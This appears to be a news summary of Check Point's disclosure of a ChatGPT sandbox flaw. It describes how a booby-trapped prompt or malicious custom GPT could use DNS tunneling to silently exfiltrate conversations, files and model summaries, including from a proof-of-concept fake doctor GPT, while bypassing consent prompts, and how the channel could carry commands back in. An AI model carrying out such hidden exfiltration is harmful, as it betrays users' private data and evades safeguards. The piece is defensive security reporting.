The invisible risk: Can you really trust your ‘private’ AI assistant to keep your secrets?
Check Point Software Technologies discovered a vulnerability in ChatGPT’s internal runtime used for data analysis and Python tasks: even though normal outbound web traffic was blocked, DNS resolution remained available and could be abused for DNS tunneling. By embedding malicious logic in a prompt—or more insidiously, in a custom GPT—the attacker could turn ordinary user interactions into a covert exfiltration channel, hiding small chunks of data inside DNS lookup requests that would not trigger ChatGPT’s usual external-transfer safeguards like GPT Actions consent prompts. The research shows that once a user pasted a booby-trapped prompt or interacted with a malicious custom GPT, subsequent conversation contents, uploaded files, and especially the model’s own distilled summaries and conclusions could be siphoned off to an attacker-controlled server without any onscreen warning. Check Point emphasizes that this is more damaging than raw document theft because extracted insights (e.g., key clauses from a 30-page contract, likely medical diagnoses, or a distilled risk assessment from a financial spreadsheet) are exactly what attackers value most. In a proof-of-concept, they built a fake “personal doctor” GPT that appeared to behave normally while silently transmitting both patient identity from uploaded lab results and the model’s medical assessment via DNS tunneling. Beyond exfiltration, the same DNS-based channel could carry commands back into the Linux container hosting the code execution environment, effectively giving remote shell-like control that remained invisible in the chat UI. Check Point reported the issue to OpenAI; the company said it had already identified the underlying problem and fully deployed a fix on February 20, 2026. The article stresses that the incident underscores a broader structural risk: as AI assistants become full-fledged workspaces for code, document analysis, and sensitive decision support, trust hinges not just on model behavior but on the integrity of hidden runtime layers that most users cannot audit. The piece urges more cautious handling of prompts and custom GPTs, and calls for hands-on, continuously monitored AI security practices across platforms such as ChatGPT, Claude, and Gemini.




